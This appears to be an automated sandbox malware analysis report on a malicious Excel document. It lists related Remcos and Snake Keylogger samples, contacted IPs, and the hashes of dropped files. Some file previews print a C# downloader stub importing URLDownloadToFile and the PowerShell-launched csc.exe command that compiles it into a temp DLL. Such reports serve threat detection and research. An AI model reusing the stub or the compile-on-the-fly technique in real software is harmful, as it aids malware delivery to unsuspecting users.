                                                                                  dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  7dcce5b76c8b17472d024758970a406bPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  No context
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):15189
                                                                                  Entropy (8bit):5.0343247648743
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                  MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                  SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                  SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                  SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):0.34726597513537405
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlll:Nll
                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):118448
                                                                                  Entropy (8bit):2.545087808141809
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Ea+QQy2y1m70sy1mHs5QUhy1m1y1mnry1miT:8QMwm70swmH4fhwm1wmnrwmC
                                                                                  MD5:99024900ACA349D8835D7624429F64DB
                                                                                  SHA1:37F8462F487263BCFA94FBF4363D7353E8A56BD1
                                                                                  SHA-256:61A705631D7530FAC4402761DEA90CDD3F217C66AF6E9F81E6A916EAD3F8CABB
                                                                                  SHA-512:3BD83E7455E89ACF31C466C1410A5227B5933FC759E678BD464D602F13322D1D669D4FC14417BC498CC4978AB4599A18D16EBC30BFB827C15C3C6574711AD08E
                                                                                  Malicious:true
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1028673
                                                                                  Entropy (8bit):7.272168802632154
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLKUqJTFVdHB61DDREb:f3v+7/5QLRGTF7E6b
                                                                                  MD5:7F0098DCC054A27F80296ADF300573EC
                                                                                  SHA1:94BD05A8F7B8B79750025D0E9B6407BEB2B85C89
                                                                                  SHA-256:468981A4E110BCA0FA99EB08C2FBDA0E1482CF8EF5FBB3ADCF82DB6609AEDE24
                                                                                  SHA-512:904ADFADE566E1404D1D07EC1EB6141E06ABDC0B74A803946294124F485F7260DE2CBDDE32F2ABAAA96C0C25F3B476D39887502D5F304B3BC346D314119B1D77
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                  Category:dropped
                                                                                  Size (bytes):5596528
                                                                                  Entropy (8bit):2.9627880151323387
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                                                  MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                                                  SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                                                  SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                                                  SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:29 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.9887223545889405
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Hae9EurpmdHMwKdNWI+ycuZhNkKakSX7PNnqSqd:HrpmzKd41ulta3BqSK
                                                                                  MD5:BA353523AC7B8ABB90A82DB33E60B2DD
                                                                                  SHA1:7E525848BDA7C964EEDE4BEDDC35759377FB68DD
                                                                                  SHA-256:E56FFDC839B37234C73C639033D66F919E13ED54960E7D7ACEA1B7CE34116597
                                                                                  SHA-512:FA1BEADAF1384922F3012F25887FFD543A6097C25A01A41EA5DD991860B85A85864571E9811852D30A98ACE6A7649BA7A79F73C3E8E3F534434F0FCA0A07FD3B
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:46 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.9580752766664196
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HuMe9EurodHdyWwKdNWI+ycuZhNdakSLPNnqSqd:OJrA9y1Kd41ulda3hqSK
                                                                                  MD5:93D09C0FA5B7E438654F289D742F0440
                                                                                  SHA1:7EC4C950805C832792DDF0F30C38E19E583A39B1
                                                                                  SHA-256:CE241E6038BCBE282CF8AEB6065E460DFB026B9CF2181CF92BCBE257082478BE
                                                                                  SHA-512:35EEAB450A212B413A32B4F7DACB98E6DB4E8F1EEAF94401C97DEDBE52317BC7D0FE482F6DB34CE0C02868DE86406127D098C8AECD0B14FCA0F34C079FF6FD45
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):134144
                                                                                  Entropy (8bit):6.988036264865725
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:YiIkiAAjad+AGbtzUAg3A+O4zPAIUO+6OzjAl1SVRxrUeHrBijxMo99FiPNWMA4Y:Ydki/jaEA2tUAIA+O0PAvO+62jAlk9rM
                                                                                  MD5:17D5375B48A0E2B4B35031BBC00D51D2
                                                                                  SHA1:6A51FAB0AE9D0D8BFADB647A0361ED9BEE5CD7D5
                                                                                  SHA-256:C01BCE2DBAE1415DC50041258654C24DBBED0C28921B04EEFFE7B03955F13F0C
                                                                                  SHA-512:C14516EDF35DD7B727B4ABEF2537A36D4DBC35203C82908918F1336EC1EB22A3217F0E04C762806EDE6E32CF1FCBB6C8C530283A9C98E8877F2091C00B780A51
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0910838560074314
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyKak7YnqqX7PN5Dlq5J:+RI+ycuZhNkKakSX7PNnqX
                                                                                  MD5:3C27190F86C6113AD9B59FADE37AF190
                                                                                  SHA1:2984583C1D8AEC850E54A53E750A57CC93BF3B17
                                                                                  SHA-256:1FB4C267D7F72CD269E1225CE6C84413DDEF4701592C2A46D0E1638783A566CF
                                                                                  SHA-512:28F97D82C371F10CFC05064F1D92C9ABA1755B5C0F87685C4191F1EA2C7A430118E3FD18D925658990F90DDEF77C537E1B333C6DDA869751F157B385AF966436
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                  Category:dropped
                                                                                  Size (bytes):474
                                                                                  Entropy (8bit):3.7159173576816786
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuLTo0o2mMmNJlQXReKJ8SRHy4HKEuibGMCcJxF/3Vy:V/DTLDfunPXfH2E9bGwJx9Vy
                                                                                  MD5:006D2BDBC05ADF8DD13C8C672F8D8BDF
                                                                                  SHA1:63A2F1D74D732F474251C0278F91DF47E3872CAF
                                                                                  SHA-256:979007D0B68B1E466E58DAEC48283B65D3778CFDAE6A40819309D85F0F624A96
                                                                                  SHA-512:762FEF864AD0FF9A168B6925934AF3B6B90B0C053DA6A62EFEC831AE9FD2FE54DE935851178EC658937B316C2218E79F2D2C49A0C5A84478CDD662C6D72B47EA
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace cIlafGiabvr.{. public class MP. {. [DllImport("UrLmon.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZUqx,string XetuSvEs,string Vel,uint ntE,IntPtr LkPdDP);.. }..}.
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):369
                                                                                  Entropy (8bit):5.269972955203054
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f+zxs7+AEszIP23fz:p37Lvkmb6KzWWZEor
                                                                                  MD5:38BFE91C3A35E274CF5EA5D0124D8354
                                                                                  SHA1:DC762A70AE07C79ECE14BD945152EBF752A2090A
                                                                                  SHA-256:8FCE80F68AA4DEE64A0221379B19723064D4E47E0E0E0879A704E3046589EAC0
                                                                                  SHA-512:C1D77C049726D37474C427E12496F80C31FDE30A7025BF5FB56C89FFD91FC15675092CB8BE47FC843CE84260F47D6AE21639CBA7CC4E0B2DD7831F7809ABBFEF
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs"
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.8077706843199537
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSVePBG5eM7p8s8Sgkaqzu1X9YYTDtkZfvHe6EqhkWI+ycuZhNkKakSX7PNnq:67sM+To6NYYTiJ/7EEH1ulta3Bq
                                                                                  MD5:B633DD8247F5204A815AB69853E0D228
                                                                                  SHA1:FF65FE2C8204CD57354BE68AE9A7B928F8D7F0BE
                                                                                  SHA-256:B66586DA6E2871A4905798690CC64614DC5EDB1051506C93A8DAB1BFD45158A4
                                                                                  SHA-512:264FD64FF130F27C8E9963ACD994D0DE9E0E739E351C54C284DA986A625CAA1806017B8AC36B53E1EFA67E56E205461BBF1E1F04EF3DE363D87488B5E9DF6137
                                                                                  Malicious:true
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.344702855498716
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:AId3ka6KznEoqKaMD5DqBVKVrdFAMBJTH:Akka60nEoqKdDcVKdBJj
                                                                                  MD5:6AA0D2E41E9DF7EF613D96D099DD066D
                                                                                  SHA1:4882956A1FC7FD16F2DAFF58E8B77537DAB043E8
                                                                                  SHA-256:6F0527A6233F2FCA96DA256F3C7D194C0AA35A9852A08407EB57BB40A0AACDE1
                                                                                  SHA-512:774B97F1E6A7D967F6D68F1A23A45FE849DE0107B66FC7B359530097FE95AB57514A06A32C4728F981CD39CB466B0F5675CEDD914A077F541DCB476811FCB0B4
                                                                                  Malicious:false
                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0711149678359173
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7YnqqLPN5Dlq5J:+RI+ycuZhNdakSLPNnqX
                                                                                  MD5:687EEB7E2B6F2068EC6ECDF0511A41C0
                                                                                  SHA1:F40544D304E7A477217FD2A5954301081FF1E0F0
                                                                                  SHA-256:305571E874FFDE06870884004624FE0CE5ABDDD896A0033A5CF6CA7A033A186F
                                                                                  SHA-512:C1BECFCC78390CE81AA1E8C20436D0A4AF5C453A031BB16F9116806F4E6CC1E3D76379E1E2F3852610DAC254F0E96148975E6F0D0BDAD580CF01D7EEB861EE19
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                  Category:dropped
                                                                                  Size (bytes):474
                                                                                  Entropy (8bit):3.7159173576816786
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuLTo0o2mMmNJlQXReKJ8SRHy4HKEuibGMCcJxF/3Vy:V/DTLDfunPXfH2E9bGwJx9Vy
                                                                                  MD5:006D2BDBC05ADF8DD13C8C672F8D8BDF
                                                                                  SHA1:63A2F1D74D732F474251C0278F91DF47E3872CAF
                                                                                  SHA-256:979007D0B68B1E466E58DAEC48283B65D3778CFDAE6A40819309D85F0F624A96
                                                                                  SHA-512:762FEF864AD0FF9A168B6925934AF3B6B90B0C053DA6A62EFEC831AE9FD2FE54DE935851178EC658937B316C2218E79F2D2C49A0C5A84478CDD662C6D72B47EA
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace cIlafGiabvr.{. public class MP. {. [DllImport("UrLmon.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZUqx,string XetuSvEs,string Vel,uint ntE,IntPtr LkPdDP);.. }..}.
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):369
                                                                                  Entropy (8bit):5.152306089846528
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f2u0zxs7+AEszIP23f2c:p37Lvkmb6Kzp0WZEoz
                                                                                  MD5:956834CED347AB99A275D7E7E27B98A2
                                                                                  SHA1:1EEADC8697BFBD4F09F9E2332BD0730B713EEA32
                                                                                  SHA-256:B1CC7102985AF8A320B3D99D3F5923DE8F61BC1DAD34873FAAB1236AF860E01C
                                                                                  SHA-512:AADE9B4C0E915A36311AD323977F64D25F5BEE50F7F0F145A43A3E1F84154622C17098E96D53E7BE0D6C9D31F233E698FDDB80635ABE6C8E9ADFCC6D621DD3BB
                                                                                  Malicious:false
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs"
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.798638603031456
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSEPBG5eM7p8s8Sgkaqz3GX9YYTDtkZf7eDqhkWI+ycuZhNdakSLPNnq:6LsM+ToWNYYTiJ7aEH1ulda3hq
                                                                                  MD5:0375D4A6469870A6E6674CD1257F6CC3
                                                                                  SHA1:6F9B401DDA79AC811CCC1F34235618CBF2AEC2A6
                                                                                  SHA-256:61EE1AD4A9828BA5BC2F177BA049DABBCB6460C3A0AF3BA12CC22BFE8459E9E2
                                                                                  SHA-512:DCCDF41CA06856BE0A931C4919A42E1ADAFC90D31F404E0F9E3A9F3D64F4AA9451A14B3FA3386E24F8C5191405A919A74A1C1DEDDBDB0E9630E96617ECB90515
                                                                                  Malicious:true
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.301797412806547
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:AId3ka6KzpVEoSKaMD5DqBVKVrdFAMBJTH:Akka60/EoSKdDcVKdBJj
                                                                                  MD5:E1B9327E710DDD0A752062DCEA329804
                                                                                  SHA1:87E13F7856384CD8AECC6A824417E8C345F0A575
                                                                                  SHA-256:398663B987DBDE1CF384C31174A081472094960675D4A39024C1820AE562A52B
                                                                                  SHA-512:743E3F5B0FF1A75C477A172D192D62F9EB00B30FA6CCDE02B78EFDE147E521973648AAD3BA9057219942FDA289FB2DBA64D2E97F820E1600718A5297CF100175
                                                                                  Malicious:false
                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1028673
                                                                                  Entropy (8bit):7.272168802632154
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLKUqJTFVdHB61DDREb:f3v+7/5QLRGTF7E6b
                                                                                  MD5:7F0098DCC054A27F80296ADF300573EC
                                                                                  SHA1:94BD05A8F7B8B79750025D0E9B6407BEB2B85C89
                                                                                  SHA-256:468981A4E110BCA0FA99EB08C2FBDA0E1482CF8EF5FBB3ADCF82DB6609AEDE24
                                                                                  SHA-512:904ADFADE566E1404D1D07EC1EB6141E06ABDC0B74A803946294124F485F7260DE2CBDDE32F2ABAAA96C0C25F3B476D39887502D5F304B3BC346D314119B1D77
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):647168
                                                                                  Entropy (8bit):7.982778814255626
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:O6JQtKmKXORstzDc6LYa3Kyq1mnHY0fNsRctTaMqsgtcc:xJ6KpXXYjgnHYcraMqsUd
